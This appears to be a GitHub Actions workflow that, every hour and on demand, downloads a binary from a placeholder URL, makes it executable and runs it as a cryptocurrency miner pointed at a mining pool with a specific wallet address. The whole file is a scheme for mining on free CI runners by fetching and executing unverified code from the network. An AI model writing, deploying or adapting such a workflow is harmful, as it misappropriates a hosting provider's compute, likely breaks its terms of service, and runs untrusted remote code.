name: Hoosat
on: 
  workflow_dispatch:
  schedule:
    - cron: '0 * * * *' # Runs every hour

jobs:
  mine:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Install dependencies
      run: |
        sudo apt-get update
        sudo apt-get install -y wget

    - name: Download miner
      run: |
        wget https://example.com/path/to/actual-miner-linux-x64
        chmod +x actual-miner-linux-x64

    - name: Start mining
      run: |
        ./actual-miner-linux-x64 --algo PYRIN --url eu.mining4people.com:3390 --user hoosat:qz4534l97cut3j2q0dljq8hc2vvgrpx8wgcm3q7edtt8ty3vsw8sxhw72eyla.timohoosat1
